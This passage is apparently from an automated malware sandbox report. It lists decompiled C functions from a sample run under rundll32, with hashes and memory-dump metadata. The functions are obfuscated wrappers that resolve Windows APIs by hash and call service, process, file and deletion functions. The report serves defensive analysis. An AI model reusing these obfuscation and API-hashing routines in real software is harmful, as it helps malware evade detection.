				_push(_a4);
				_push(__ecx);
				E0027602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002807A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00275fb5
0x00275fb6
0x00275fb7
0x00275fbb
0x00275fbc
0x00275fc1
0x00275fcb
0x00275fd7
0x00275fde
0x00275fe5
0x00275ffc
0x00275fff
0x00276006
0x0027600d
0x0027601a
0x00276025
0x0027602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00276025

Memory Dump Source

Source File: 0000000B.00000002.2109883374.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000B.00000002.2109871560.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2109961520.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 46e8d10550a73657c38d30a72f43b91e223ea195f7de58e536ff4085b5ab4dbd
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: BFF04FB4C11208FFDB48DFA0E94689EBFB8EB40300F208198E409A7260E7715F159F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2444 Parent PID: 2884 rundll32.exeCOMMON

Executed Functions

Function 00222959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00222959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0022602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002307A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0022295f
0x00222964
0x00222967
0x0022296a
0x0022296d
0x0022296e
0x0022296f
0x00222977
0x00222985
0x0022298a
0x00222992
0x0022299a
0x002229a2
0x002229a9
0x002229b0
0x002229b7
0x002229bb
0x002229cf
0x002229dc
0x002229e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002229DC

Strings

<^, xrefs: 00222977

Memory Dump Source

Source File: 0000000C.00000002.2111624405.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2111618027.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2111676302.000000000023C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_220000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 37b4d298cd155c94a1be96190f1608c22ec2d5d7dc8241c68084df23160ea007
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: E5016D72A00108BFEB14DF95DC4A8DFBFB6EF44310F108088F508A6250D7B69F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0022C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0022C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0022602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002307A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0022c6e1
0x0022c6e6
0x0022c6f0
0x0022c6fc
0x0022c703
0x0022c706
0x0022c70d
0x0022c711
0x0022c715
0x0022c71c
0x0022c723
0x0022c72a
0x0022c731
0x0022c738
0x0022c751
0x0022c762
0x0022c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0022C762

Strings

/O, xrefs: 0022C6E6

Memory Dump Source

Source File: 0000000C.00000002.2111624405.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2111618027.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2111676302.000000000023C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_220000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 9aff3a284bdbc7005846512a2e192847c3488d4c6c202e5d49d862151a6953d0
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 711133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3B14B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00221000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00221000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0022602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002307A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00221006
0x00221009
0x0022100c
0x00221011
0x00221016
0x0022101d
0x00221026
0x0022102d
0x00221034
0x0022103b
0x00221047
0x0022104f
0x00221057
0x0022105e
0x00221065
0x0022106c
0x00221073
0x00221077
0x0022108b
0x00221096
0x0022109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00221096

Strings

[, xrefs: 0022103B

Memory Dump Source

Source File: 0000000C.00000002.2111624405.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2111618027.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2111676302.000000000023C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_220000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 9b0b4243c09f153743ba963f172af61627f32187394d3e2d1bec8dfbc1c5dfe0
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 8C015BB6D01308BBDF04DFA4C94A5DEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 00224859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00224859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002307A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0022485e
0x0022487a
0x0022487d
0x00224884
0x0022488b
0x00224892
0x0022489d
0x002248a0
0x002248ad
0x002248b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002248B7

Strings

[, xrefs: 0022488B

Memory Dump Source

Source File: 0000000C.00000002.2111624405.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2111618027.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2111676302.000000000023C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_220000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 81f399a38b3290deff4e9d0da5b8e83badc44d24b0f9d8852c102545871cb71b
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 7AF017B0A15209FBDB04CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 00234F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00234F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002307A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00234f80
0x00234f81
0x00234f82
0x00234f86
0x00234f87
0x00234f8c
0x00234fa5
0x00234fa8
0x00234faf
0x00234fb6
0x00234fc7
0x00234fca
0x00234fd7
0x00234fe2
0x00234fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00234FE2

Strings

{#lm, xrefs: 00234FC2

Memory Dump Source

Source File: 0000000C.00000002.2111624405.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2111618027.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2111676302.000000000023C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_220000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 425c42de30eaec02a6b06aeb807420b13a9b3e840beb4bdeece3b006ea06cbfa
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: E9F037B181120CFFDB04DFA4D98689EBFBAEB40300F208199E804AB250D3715B50AB50

Uniqueness

Uniqueness Score: -1.00%

Function 0023976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0023976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002307A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00239772
0x00239773
0x00239778
0x0023977a
0x0023977b
0x0023977e
0x0023977f
0x00239782
0x00239785
0x00239788
0x00239789
0x0023978c
0x0023978f
0x00239790
0x00239791
0x00239794
0x00239797
0x0023979a
0x0023979d
0x002397a0
0x002397a3
0x002397a6
0x002397a7
0x002397a8
0x002397ad
0x002397b7
0x002397c3
0x002397ca
0x002397d1
0x002397d8
0x002397df
0x002397e3
0x002397fc
0x00239816
0x0023981d

APIs

CreateProcessW.KERNEL32(0022591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0022591A), ref: 00239816

Memory Dump Source

Source File: 0000000C.00000002.2111624405.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2111618027.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2111676302.000000000023C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_220000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 9a7324920c6fa73872278b88570e0d2bf5650161ff1a26a3230580b4f81e3e9e
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 3B11B072911188BBDF1A9FD6DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0022B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0022B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0022602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002307A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0022b569
0x0022b56a
0x0022b56d
0x0022b572
0x0022b574
0x0022b577
0x0022b57a
0x0022b57d
0x0022b580
0x0022b583
0x0022b586
0x0022b587
0x0022b58a
0x0022b58d
0x0022b590
0x0022b593
0x0022b594
0x0022b595
0x0022b59a
0x0022b5a4
0x0022b5b8
0x0022b5c0
0x0022b5c4
0x0022b5cb
0x0022b5d2
0x0022b5d9
0x0022b5e6
0x0022b5fd
0x0022b604

APIs

CreateFileW.KERNELBASE(00230668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00230668,?,?,?,?), ref: 0022B5FD

Memory Dump Source

Source File: 0000000C.00000002.2111624405.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2111618027.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2111676302.000000000023C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_220000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: e1549cc0f43a334951d18b49cf8d68a4c31339b5c1d8a32f795c95a95794c2c5
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 8511C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0023981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0023981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002307A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00239821
0x00239822
0x00239825
0x00239828
0x0023982a
0x0023982c
0x0023982f
0x00239832
0x00239835
0x00239836
0x00239837
0x0023983c
0x00239855
0x00239858
0x0023985f
0x00239866
0x0023986d
0x00239874
0x0023987b
0x0023988e
0x0023989b
0x002398a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002287F2,0000CAAE,0000510C,AD82F196), ref: 0023989B

Memory Dump Source

Source File: 0000000C.00000002.2111624405.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2111618027.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2111676302.000000000023C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_220000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: befe9fe0183202295763c4f616bb3e888194596f68a67a8b2acadb36196cd915
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 92015A76801208FBDB04EFE5DC46CDFBF79EF85750F108199F918A6220E6719B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00237BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00237BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002307A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00237bf7
0x00237bf8
0x00237bfa
0x00237bfd
0x00237bff
0x00237c02
0x00237c06
0x00237c07
0x00237c0f
0x00237c1d
0x00237c25
0x00237c2d
0x00237c31
0x00237c38
0x00237c3f
0x00237c46
0x00237c4a
0x00237c5e
0x00237c67
0x00237c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00237C67

Memory Dump Source

Source File: 0000000C.00000002.2111624405.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2111618027.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2111676302.000000000023C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_220000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 0e41601c5170870fff14c69e3aeec768b21d7b82c6e0726c682f4726547fb5ef
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: D2014FB190120CFFEB09DFA4D84A8DEBBB5EF44314F108198F40567240E6B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 0022F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0022F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002307A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0022f662
0x0022f663
0x0022f665
0x0022f668
0x0022f66a
0x0022f66d
0x0022f670
0x0022f673
0x0022f677
0x0022f678
0x0022f67d
0x0022f687
0x0022f693
0x0022f69a
0x0022f6a1
0x0022f6a5
0x0022f6a9
0x0022f6b0
0x0022f6c9
0x0022f6d8
0x0022f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0022F6D8

Memory Dump Source

Source File: 0000000C.00000002.2111624405.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2111618027.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2111676302.000000000023C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_220000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: c219bc23b31abedc45fcf728708936782f9d9bba77c4ca36990c459a2553eb13
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 3001E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25F21EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0022B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0022B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0022602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002307A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0022b6f3
0x0022b6f8
0x0022b702
0x0022b70b
0x0022b712
0x0022b719
0x0022b720
0x0022b727
0x0022b72e
0x0022b747
0x0022b759
0x0022b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0022B759

Memory Dump Source

Source File: 0000000C.00000002.2111624405.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2111618027.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2111676302.000000000023C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_220000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 805ceceae2d365355b6515513bd125146e4d87094100ab013cfcd0affd305b92
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 99012CB6951308FBEB45DF94DD06A9E7BB5EB14704F108188FA0566190D3B15A20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 0023AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0023AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002307A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0023aa3f
0x0023aa40
0x0023aa41
0x0023aa44
0x0023aa47
0x0023aa4b
0x0023aa4c
0x0023aa51
0x0023aa5b
0x0023aa64
0x0023aa68
0x0023aa6f
0x0023aa76
0x0023aa8d
0x0023aa90
0x0023aa9d
0x0023aaa8
0x0023aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0023AAA8

Memory Dump Source

Source File: 0000000C.00000002.2111624405.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

